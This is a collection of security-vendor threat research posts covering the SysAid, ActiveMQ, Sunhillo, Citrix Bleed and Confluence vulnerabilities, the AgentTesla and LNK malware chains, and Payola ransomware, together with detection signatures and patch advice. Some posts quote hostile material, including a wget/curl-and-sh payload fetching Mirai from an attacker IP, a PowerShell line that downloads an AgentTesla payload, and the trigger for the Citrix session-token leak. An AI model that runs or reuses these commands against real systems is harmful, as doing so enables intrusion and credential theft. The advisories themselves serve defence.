Posts

SysAid Path Traversal Vulnerability

Overview

SonicWall Capture Labs Threat Research Team became aware of the SysAid path traversal vulnerability, assessed its impact and developed mitigation measures for the vulnerability. On November 8, 2023, SysAid, an IT service management company, disclosed CVE-2023-47426, which is a zero-day path traversal vulnerability carrying a CVSS 9.8 score and affecting on-premise SysAid servers running version < 23.3.36. According to Microsoft’s threat intelligence team and SysAid’s Advisory, it has been exploited in the wild by Lace Tempest (DEV-0950 / TA-505). SonicWall is also currently seeing an increasing number of active exploitation attempts. This is the same threat actor responsible for exploiting the MoveIT File Transfer Tool vulnerability, and the threat actor is associated with a ransomware group known as "CL0P". To mitigate this vulnerability, SysAid has released a patch which is present in version 23.3.36.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-47246.

The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

This path traversal vulnerability allows for threat actors to upload a malicious WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service through a POST request. The attacker can then request the web shell by browsing to the URL where it now resides to gain access to the server.

Triggering the Vulnerability

The vulnerability exists within the SysAid com.ilient.server.UserEntry class in the doPost method. The accountID parameter within this request is suspectable to the path injection since it is directly passed to the File function. By decompiling the Java code, it is possible to see the accountID parameter being saved into a string variable named convertParamater as shown in Figure 1.

Figure 1: doPost Method parsing accoutnId

convertParameter is then stored in a variable which is passed to the file constructor as shown in Figure 2. For readability, the variable has been renamed accountIDParameter.

Figure 2: accountID being used to create a file

The path dictated in the accountID parameter is the location where the data in the body of the POST request will be written. Therefore, to trigger and leverage this vulnerability the attacker needs to send a POST request to the server with the accountID parameter set to where the data in the body of the post request should be written.

Exploitation

Threat actors have been seen successfully exploiting this vulnerability by uploading a WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service. This is accomplished by sending a POST request with a zlib compressed WAR file containing the web shell as the request body and the accountID parameter are injected with the webroot directory. The threat actor then executes this web shell and gains access to the system by navigating to the location injected into the accountID parameter.

Post-Exploitation

After gaining a web shell through the SysAid vulnerability, threat actors were seen leveraging two PowerShell scripts to carry out post exploitation activities. The first is used to launch a malware loader named user.exe. This loads the GraceWire trojan and injects it into Windows processes such as spoolsv.ese. Following the first GraceWire trojan deployment, a second PowerShell script is used to erase evidence associated with the attacker’s actions including cleaning the SysAid on-prem server web logs. Figure 3 below shows the complete attack chain as presented by Zscaler.

Figure 3: Zscaler’s suspected exploit chain

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • Attempted Exploitation – IPS:4172 SysAid On-Prem Software Directory Traversal
  • Known Post Exploitation – SPY: 500 Malformed-ps1 ps1.OT_1
  • Known Post Exploitation – SPY: 501 Malformed-ps1 ps1.OT_2

Threat Graph

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graph in Figure 4 indicates an increasing number of exploitation attempts and we expect exploitations to continue to increase.

Figure 4: SonicWall IPS 4172 Threat Graph

Remediation Recommendations

SysAid has released an update to patch the vulnerability, and it is strongly recommended to update to version 23.3.36 if running a SysAid On-Prem server. The SysAid advisory has also published relevant IOCs and recommendations to identify any system compromise.

Relevant Links

Malicious LNK Files Use PowerShell to Deliver Payload

Overview

This week, the Sonicwall Capture Labs Research team has observed an increase in shortcut-based (LNK) malware. These seemingly legitimate LNK files execute PowerShell commands to download malware from a remote server.

Infection Cycle

The malware sample arrives as a file with a .lnk file extension and may use the following names:

  • New product Reebok 2023.lnk
  • Income and benefits – UNIQLO 2023.lnk
  • Requirements and responsibilities – UNIQLO 2023.lnk
  • LAST STUDIO List new product 2023.lnk
  • Last Studio 2023 New Arrivals Campaign Contract.lnk

Executing the .lnk file will run an instance of powershell.exe in the background. PowerShell is built in to Windows and is used as a scripting language that is mostly used to automate admin tasks.

The script is base64 encoded, and when decoded, it shows that its main purpose is to download additional files from a remote server.

Figure 1: Command line

The execution of this script is done without the knowledge of the user and utilizes the following options when running PowerShell.

p o w e r s h e l l . e x e - N o L o g o - N o P r o f i l e - W i n d o w S t y l e h i d d e n - E x e c u t i o n P o l i c y b y p a s s - E n c o d e d C o m m a n d

Meanwhile, an image file is launched and shows a picture of a product. In the screenshot below, an image of what seems like a Reebok-branded outfit is shown when executing the malicious LNK file named “New product Reebok 2023.lnk”.

Figure 2: Reebok outfit

During our analysis, a file named svczHost.exe was downloaded in \Windows\Temp.

Figure 3: Powershell.exe connecting to a remote host to download a file which was saved into %temp% directory as svczHost.exe

This then further downloaded another file named MyRdpService.exe in the same directory.

Figure 4: SvczHost.exe connecting to a remote host and downloading an additional component file that was later written into %temp% directory as myRdpService.exe

As seen in Figures 5 and 6, MyRdpService.exe was constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 5: MyRdpService.exe constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 6: Encrypted packet sent to remote C&C by MyRdpService.exe

Figure 7 shows a log file named logrdp.txt was created which looks like the connection log file. Interestingly the log file, contains some text in Vietnamese.

Figure 7: Log file

We have seen an increasing amount of malicious LNK files used by cybercriminals to deliver payloads. These Windows shortcut files can contain malicious code to abuse legitimate windows system tools, which is a simple way for criminals to evade detection.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

• GAV: Suspicious#powershell.steal (Trojan)
• GAV: Infostealer.AIL (Trojan)

This threat is also detected by SonicWALL Capture ATP with RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for November 2023

Overview

Microsoft’s November 2023 Patch Tuesday has 57 vulnerabilities, and 15 of them are remote code execution vulnerabilities. The vulnerabilities can be classified into the following categories:

  • 17 Elevation of Privilege Vulnerabilities
  • 5 Security Feature Bypass Vulnerabilities
  • 15 Remote Code Execution Vulnerabilities
  • 6 Information Disclosure Vulnerabilities
  • 5 Denial of Service Vulnerabilities
  • 9 Spoofing Vulnerability

Figure 1: A pie chart breaking down the vulnerabilities by category.

The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2023 and has produced coverage for six of the reported vulnerabilities.

Vulnerabilities with Detections

CVE-2023-36033   Windows DWM Core Library Elevation of Privilege Vulnerability
ASPY 505 Exploit-exe exe.MP_351
CVE-2023-36036   Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
ASPY 506 Exploit-exe exe.MP_352
CVE-2023-36394   Windows Search Service Elevation of Privilege Vulnerability
ASPY 504 Exploit-exe exe.MP_350
CVE-2023-36399   Windows Storage Elevation of Privilege Vulnerability
ASPY 503 Exploit-exe exe.MP_349
CVE-2023-36413   Microsoft Office Security Feature Bypass Vulnerability
ASPY 507 Malformed-docx docx.MP_10
CVE-2023-36424   Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 502 Exploit-exe exe.MP_348

Remote Code Execution Vulnerabilities

CVE-2023-36017   Windows Scripting Engine Memory Corruption Vulnerability
CVE-2023-36028   Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
CVE-2023-36041   Microsoft Excel Remote Code Execution Vulnerability
CVE-2023-36045   Microsoft Office Graphics Remote Code Execution Vulnerability
CVE-2023-36393   Windows User Interface Application Core Remote Code Execution Vulnerability
CVE-2023-36396   Windows Compressed Folder Remote Code Execution Vulnerability
CVE-2023-36397   Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
CVE-2023-36401   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36402   Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2023-36423   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36425   Windows Distributed File System (DFS) Remote Code Execution Vulnerability
CVE-2023-36437   Azure DevOps Server Remote Code Execution Vulnerability
CVE-2023-36439   Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2023-38151   Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability
CVE-2023-38177   Microsoft SharePoint Server Remote Code Execution Vulnerability

Elevation of Privilege Vulnerabilities

CVE-2023-36033   Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2023-36036   Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2023-36047   Windows Authentication Elevation of Privilege Vulnerability
CVE-2023-36049   .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability
CVE-2023-36394   Windows Search Service Elevation of Privilege Vulnerability
CVE-2023-36399   Windows Storage Elevation of Privilege Vulnerability
CVE-2023-36400   Windows HMAC Key Derivation Elevation of Privilege Vulnerability
CVE-2023-36403   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36405   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36407   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36408   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36422   Microsoft Windows Defender Elevation of Privilege Vulnerability
CVE-2023-36424   Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2023-36427   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36558   ASP.NET Core – Security Feature Bypass Vulnerability
CVE-2023-36705   Windows Installer Elevation of Privilege Vulnerability
CVE-2023-36719   Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability

Denial of Service Vulnerabilities

CVE-2023-36038   ASP.NET Core Denial of Service Vulnerability
CVE-2023-36042   Visual Studio Denial of Service Vulnerability
CVE-2023-36046   Windows Authentication Denial of Service Vulnerability
CVE-2023-36392   DHCP Server Service Denial of Service Vulnerability
CVE-2023-36395   Windows Deployment Services Denial of Service Vulnerability
Information Disclosure Vulnerabilities
CVE-2023-36043   Open Management Infrastructure Information Disclosure Vulnerability
CVE-2023-36052   Azure CLI REST Command Information Disclosure Vulnerability
CVE-2023-36398   Windows NTFS Information Disclosure Vulnerability
CVE-2023-36404   Windows Kernel Information Disclosure Vulnerability
CVE-2023-36406   Windows Hyper-V Information Disclosure Vulnerability
CVE-2023-36428   Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability

Security Feature Bypass Vulnerabilities

CVE-2023-36021   Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability
CVE-2023-36025   Windows SmartScreen Security Feature Bypass Vulnerability
CVE-2023-36037   Microsoft Excel Security Feature Bypass Vulnerability
CVE-2023-36413   Microsoft Office Security Feature Bypass Vulnerability
CVE-2023-36560   ASP.NET Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE-2023-36007   Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability
CVE-2023-36016   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36018   Visual Studio Code Jupyter Extension Spoofing Vulnerability
CVE-2023-36030   Microsoft Dynamics 365 Sales Spoofing Vulnerability
CVE-2023-36031   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36035   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36039   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36050   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36410   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

AgentTesla Updates Its Infection Chain

The SonicWall Capture Labs Threat Research team has observed AgentTesla infostealer being deployed using image(.jpg) files for last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen targeting European nations with AgentTesla stealer and other bots having a wide variety of capabilities.
Infection_Chain

Figure 1: Infection Chain

The initial infection vector is an email with a ZIP file as an attachment. Inside the ZIP file there is a VBS script which is highly obfuscated, needing some heavy de-obfuscation to extract the next stage. The VBS on execution decodes the PowerShell code below:
2_Powershell

Figure 2: PowerShell Script

This PowerShell then downloads an image file Rump_vbs.jpg from the URL: "hxxps://uploaddeimagens[.]com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937".
3_PayloadImageFig_1

Figure 3: Image file embedded with DLL

The PowerShell retrieves a base64 encoded DotNet DLL file from the image file which is embedded between marker tags "BASE64_START" and "BASE64_END". This data is decoded and the DotNet assembly is then loaded into memory.

4_Image_Marker_tags

Figure 4: Image marker tags

After that, the PowerShell loads decoded Fiber.dll, which has the method "VAI" downloading and executing base64 encoded DotNet executable from the URL: "hxxp://79.110.48[.]52/kenjkt.txt".

This is done using: "$method = $type.GetMethod(‘VAI’).Invoke($null, [object[]] (‘txt.tkjnek/25.84.011[.]97//:ptth’ , ‘dfdfd’ , ‘dfdf’ , ‘dfdf’ , ‘dadsa’ , ‘de’ , ‘cu’))".

The downloaded Fiber.dll is again a heavily obfuscated DotNet assembly and has obfuscated API strings for process injection. Although it has a number of methods, a majority of the methods inside the file have junk code.

5_ProcessInjection_APIs

Figure 5: Obfuscated API names for Process Injection

AgentTesla

For a long time, AgentTesla has been known for its wide variety of stealing and logging capabilities.
The txt file hosted on URL "hxxp://79.110.48[.]52/kenjkt.txt" has base64 encoded data. The decoded DotNet executable is the AgentTesla Payload. First, it enumerates for all of the Chromium-based and Mozilla-based browsers for the sensitive data they store.

ChromiumBased_Browsers

Figure 6: Chromium-based browser’s data

Next, it appears that the malware has methods to search for Mozilla login data including the username and passwords in the victim’s machine.
7_Mozilla_Data

Figure 7: Mozilla logins

Furthermore, it has functionality to retrieve sensitive credentials stored using Windows Vault GUIDs.
8_WinCredGUIDs

Figure 8: Win Vault GUIDS

AgentTesla does have keyboard hooking, clipboard hooking and logging functionality. Additionally, it has multiple APIs to retrieve keyboard layout and other details as well as information related to Windows and other system information.
1_WindowAPIs_Stealer

Figure 9: System information APIs

The stealer also has a list of sensitive strings or smart words, which contain a number of words leading to the private and sensitive information of an individual. In addition to this, it also checks for different email software, other common software for DB management and FTP connection and a few more well-known software.

10_TelegramBot

Figure 10: SmartWords and Telegram bot

Further, the data is exfiltrated via a telegram bot.

Evidence of detection by SonicWall’s RTDMI ™ engine can be seen below in the Capture ATP report for this file:
11_CaptureATP

Figure 11: RTDMI ATP report results

IOCs:
SHA:
9346658f9a881fa08edcf2d4071ae99f71ada25fbdcad0eaf7dfb204c5867a0d
0f6b26bc3cad49b68ab669c5d9def97db345f6c23b8d0ee9cff48262c2db0743
60304a8c52b10cd71bcc76f8a3ad0f0bbfe7395d2c64833400ac06d3c2c81d58
01ec36cf3833166dbad8aeef0c5683905b31956a5d5367ac52fa7aee2be9c64e

URLs:

  • hxxp://79.110.48[.]52/kenjkt.txt
  • hxxps://uploaddeimagens.com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937

Apache ActiveMQ Remote Code Execution (CVE_2023_46604)

Overview

The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting Apache ActiveMQ allowing a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. The vulnerability is categorized as an Unbounded deserialization resulting in ActiveMQ being vulnerable to a remote code execution (RCE) attack. This issue has a CVSS base score of 10.0. CVE-2023-46604 is an unauthenticated deserialization vulnerability in ActiveMQ’s OpenWire transport connector, which is enabled by default and impacts both “Classic” and Artemis clients and brokers. Vulnerable software versions include:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Organizations still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-46604.

The overall CVSS 3.1 score is 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H).

Base score is 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is low.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.4 (E:P/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is proof of concept code.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview

Apache ActiveMQ is a widely used open-source message broker written in Java, known for its multi-protocol compatibility. It offers clients the flexibility of choosing from a variety of programming languages and platforms, with support for JavaScript, C, C++, Python, .Net and others.

An attacker connected to OpenWire TCP port 61616 can send an OpenWire packet to unmarshall an ExceptionResponse object instance. By supplying an arbitrary class name as well as an arbitrary string parameter to the BaseDataStreamMarshaller.createThrowable, the attacker will, have access to an arbitrary class to be instantiated with a single command string parameter.

Exploitation

At SonicWall Capture Labs Threat Research, we have recreated the PoC using Metasploit framework as demonstrated in Figure 1.

Before exploitation can occur, the following conditions must be true:

  • The attacker must have network access.
  • The attacker must send a manipulated OpenWire “command” (used to instantiate an arbitrary class on the classpath with a String parameter).
  • A class must be present on the installation in the classpath which can execute arbitrary code simply by instantiating it with a String parameter.

Figure 1 below demonstrates the following steps to exploit this vulnerability:

  • Create and start a vulnerable victim server.
  • Uses a Metasploit module to host the poc.xml file on the attacker’s server.
  • Finally, run the exploit by running Exploit.java.
  • Additionally using Shodan dork we can observe over 6000 vulnerable servers exposed on the internet.

Figure 1: SonicWall Capture Labs Threat Research Exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS:15940 – Apache ActiveMQ OpenWire Protocol Insecure Deserialization

Threat Graphs

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graphs below indicate an increasing number of exploitation attempts and we expect exploitations to continue to increase.

Figure 2: Threat Graph

Remediation Recommendations

Admins still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

If that’s not possible, users can mitigate the issue by validating the provided throwable class type via OpenWire marshallers that takes care of OpenWire commands. Further steps to mitigate are dictated on the official link.

Relevant Links

Payola ransomware operator demands remote access to PC

The Sonicwall threat research team have recently been tracking a new ransomware family called Payola. This family of ransomware appeared in late August 2023. It is written in .NET and is easy to analyze as it contains no obfuscation. Early variants would append ".Payola" to the names of encrypted files but the current variants use 5 random alphanumeric characters. During a direct conversation with the malware operator, remote access to our system was requested in order to retrieve files.

Infection Cycle:

The malware uses the following icon:

Upon execution, the following message is shown on the desktop background:

Files on the system are encrypted. Each encrypted file is given a 5 character alphanumeric extension appended to its name eg. image.jpg.PTebc.

The following registry entry is made:

  • HKCU\Microsoft\Windows\CurrentVersion\Run Readme {run location}

A file named README.html is dropped into directories where files where encrypted. It contains the following message:

The code is written in .NET and is trivial to decompile. We can easily see its main function and the intended program flow:

The RSA public key and salt values can be seen:

The malware contains a list of programs that will be killed if running:

A list of targeted directories and file types are listed in the code:



We followed the instructions in the ransom note and got in touch with the operator. We had the following conversation via email where the operator demanded remote access to our system using Anydesk:

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: Payola.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Sunhillo SureLine Command Injection Vulnerability

Overview

The SonicWall Capture Labs Threat Research team has analyzed honeypot data which reveals that attackers are actively exploiting an old vulnerability found in Sunhillo SureLine devices. They are specifically taking advantage of a command injection flaw within these devices. The Sunhillo SureLine software is designed to further process surveillance data such as format conversion and data filtering as it is transported in real time.

A critical vulnerability identified as CVE-2021-36380 with a CVSS score of 9.8 was discovered in the Sunhillo SureLine software application. The vulnerability is an unauthenticated operating system (OS) command injection flaw, which could allow an attacker to execute arbitrary commands with root privileges. This could lead to a complete compromise of the target system, enabling the attacker to cause a denial of service or establish persistence on the network. To mitigate this vulnerability, it is strongly recommended that users update Sunhillo SureLine software to at least version 8.7.0.1.1 as SonicWall is seeing an increased number of exploitation in the wild.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-36380
The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

Sunhillo SureLine versions before 8.7.0.1.1 contain an unauthenticated OS command injection vulnerability through the ipAddr or dnsAddr parameters within the networkDiag.cgi script.
This script allows user-provided data to be directly inserted into a shell command via ipAddr or dnsAddr parameters. This makes it possible for an attacker to influence the command’s behavior by injecting valid OS command inputs.

Triggering the Vulnerability

To trigger the vulnerability, an attacker sends a specially crafted POST request to the webserver at the URL /cgi/networkDiag.cgi . Within this request, the attacker needs to insert a Linux command as part of the ipAddr or dnsAddr POST parameters. When the webserver processes the POST request, the command the attacker has inserted into the parameter will be executed. The lack of authentication makes it easier for an attacker to exploit this vulnerability.

Exploitation

The following POST request demonstrates how the vulnerability is being exploited in the wild:

The POST request has a malicious payload designed to exploit the vulnerability. It attempts to download a script "l.sh" from the remote server "194.180.48.100" to the "/tmp" directory on the target system using both "wget" and "curl." After downloading the script, it is executed using the "sh" command. Let’s breakdown the payload:

  • cd /tmp: Changes the current directory to "/tmp."
  • wget httpx://194.180.48.100/l.sh: Downloads the "l.sh" script from the specified URL.
  • curl -O httpx://194.180.48.100/l.sh: Downloads the "l.sh" script using "curl" with the "-O" option.
  • sh l.sh: Executes the downloaded "l.sh" script using the "sh" command.

Looking up the attacker-controlled server on VirusTotal, we see that the URL (Figure 1) and the script l.sh (Figure 2) are marked as malicious and are used by the Mirai botnet.

Figure 1

Figure 2

Figure 2

Mirai is a malware that created a big botnet of networked devices running Linux making them remotely controlled bots that can be used for large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS 15931: Sunhillo SureLine Command Injection

Threat Graph


Recent indications of increased signature hits point to an ongoing exploitation of this vulnerability in real-world scenarios. It appears that the Mirai botnet has expanded its scope to target vulnerable Sunhillo devices for the distribution of malware.

IOCs

  • SHA256: c8cf29e56760c50fa815a0c1c14c17641f01b9c6a4aed3e0517e2ca722238f63 (l.sh)
  • Known Malicious C2: 194.180.48.100

Remediation Recommendations

To mitigate this vulnerability, it is strongly recommended to update Sunhillo SureLine devices to at least version 8.7.0.1.1. This update will address the security issue and improve the overall system’s resilience against such exploits.

Relevant Links

https://nvd.nist.gov/vuln/detail/CVE-2021-36380
https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/

Citrix Bleed: Leaking Session Tokens Vulnerability

Overview

SonicWall Capture Labs Threat Research Team became aware of the threat Citrix Bleed, assessed its impact and developed mitigation measures for the vulnerability.

Citrix NetScaler is an Application Delivery Controller (ADC) and load balancer designed to enhance the performance and security of web-based applications. Produced by Citrix Systems, NetScaler ensures the swift, reliable and secure delivery of applications to devices everywhere. It combines advanced traffic management, application security, content switching and optimization features in one platform.

Citrix NetScaler, encompassing both ADC and NetScaler Gateway, recently came under scrutiny for a vulnerability identified as CVE-2023-4966. As of October 18th, CISA has reported active exploitation of this vulnerability. This flaw pertains to a sensitive information disclosure that can occur when the system is set up as a Gateway (encompassing VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or an AAA “virtual” server. Notably, the vulnerability corresponds to CWE-119, which is described as “improper restriction of operations within the bounds of a memory buffer”. In some configurations, the sensitive information disclosed can include a valid session token.

The affected versions are:
  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC 13.1-FIPS before 13.1-37.164
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

This vulnerability has been patched by Citrix on October 10th and can be mitigated by upgrading to the latest version of NetScaler.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-4966.

The overall CVSS score is 9.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L/E:X/RL:X/RC:X).

Base score is 9.4 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L), based on the following metrics:
  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is Low.
Temporal score is N/A (E:X/RL:X/RC:X), based on the following metrics:
  • The exploit code maturity level of this vulnerability is Not Defined.
  • The remediation level of this vulnerability is Not Defined.
  • The report confidence level of this vulnerability is Not Defined.

Technical Overview

In an effort to pinpoint the vulnerability, a comparative analysis was conducted between the two specific versions of the software: the older 13.1-48.47 and the newer 13.1-49.15. By meticulously examining the differences and updates between these versions, we were able to identify the exact location of the patch and gain a deeper understanding of the vulnerability’s nature. In Figure 1 the differences can be seen by using the tool BinDiff.

Figure 1

The ns_vpn_process_unauthenticated_request function has been meticulously crafted to build and validate the URL /oauth/idp/.well-known/openid-configuration. Within its implementation, there is a significant call to ns_aaa_oauth_send_openid_config, which makes use of the snprintf function as seen in Figure 2.

Figure 2

The primary role of this function is to format and populate the print_temp_rule buffer with a series of characters and values. Delving into its specifics: the destination buffer is print_temp_rule, and it has a Maximum Size of 0x20000, which is equivalent to roughly 128 KB. The format string, a comprehensive JSON object, as seen in Figure 3, details the OpenID Connect configuration.

Figure 3

The snprintf as seen in Figure2, employs multiple %.*s format specifiers which expect a length and a string as paired arguments. These specifiers are used to define various OAuth and OpenID Connect endpoints, with the base URL or domain inferred from the variable host_string. To shed light on the arguments (figure 2): length denotes the length of the host_string and ensures only up to length characters from host_string are printed. The host_string reference is the base URL or domain that fills in the respective URLs in the JSON.

In the aftermath of this operation, not_size_buffer will hold the count of characters intended for print_temp_rule, excluding the null byte, if there were no buffer constraints. This behavior of snprintf is typical: It returns the number of characters it aims to write, irrespective of the size limit that might truncate the actual write-up. Thus, not_size_buffer captures the length of the fully constructed JSON string.

This function’s design intricacies go beyond just formatting; there’s a security facet to it. Initially, the function would instantly send out the response. But in its patched form, a response is dispatched only if snprintf yields a value less than 0x20000.

There’s a vulnerability in how the return value of snprintf is used to determine how many bytes are sent to the client through ns_vpn_send_response. Contrary to what one might expect, snprintf doesn’t return the number of bytes it actually writes to the buffer. Instead, it returns the number it would have written if the buffer was large enough. This is where the security risk comes into play. The return value is being incorrectly used as the number of bytes written to the buffer.

Triggering the Vulnerability

  • The target must be running NetScaler Citrix Firmware version prior to 13.1-49.15.
  • The attacker must have network access to the vulnerable software.
  • Sending a GET request to the endpoint: /oauth/idp/.well-known/openid-configuration,
containing Host: a (any ‘char’ to the power of 24,576).

Exploitation

To exploit this vulnerability, the attacker’s goal is to generate a response that exceeds a buffer size of 0x20000 bytes. If successful, the application would send not only the filled buffer but also the memory following the print_temp_rule buffer, potentially exposing sensitive data or causing other unexpected issues. Proof of concept code has been published and active exploitation of this vulnerability has been reported by CISA on October 18th. Included in the leaked information, depending on the appliance’s configuration, is a 65 byte long hex string which is a valid session cookie. As a resulted an attacker can use this session key to impersonate an active user.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS:4130 NetScaler ADC/Gateway Information Disclosure

Threat Graph

SonicWall sensors have confirmed a spike in exploitation attempts of this vulnerability and may witness even bigger surge in the upcoming days.

Figure 4: SonicWall signature hits data (Updated 12/20/23)

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:
  • Applying the vendor-supplied patch to eliminate this vulnerability.
  • Utilizing up-to-date IPS signatures to filter network traffic.
  • Alternatively, consider taking the server offline.

Relevant Links

  • CVE-2023-4966
  • CNA CVSS Metrics
  • Vendor Advisory
  • Citrix Bleed
  • Public POC

Atlassian Confluence Data Center and Server Broken Access Control Vulnerability

Overview

The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting on-premises instances of Confluence Server and Confluence Data Center allowing unauthorized users to get administrative-level privileges by creating unauthorized Confluence administrator accounts. The vulnerability is categorized as a Broken Access Control issue and has a CVSS base score of 10.0. CISA has warned that nefarious activists exploited CVE-2023-22515 as a zero-day to retrieve legitimate access over victim systems. Atlassian described this vulnerability initially as Privilege Escalation but later categorized it as Broken Access Control and released an advisory on October 4th, 2023 for CVE-2023-22515. The vendor has classified this vulnerability as Broken Authentication and Session Management (BASM). Atlassian Cloud sites are not affected by this vulnerability. Vulnerable software versions include 8.0.0-8.0.3, 8.1.0, 8.1.3-4, 8.2.0-8.2.3, 8.3.0-8.3.2, 8.4.0-8.4.2, 8.5.0-1.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-22515.

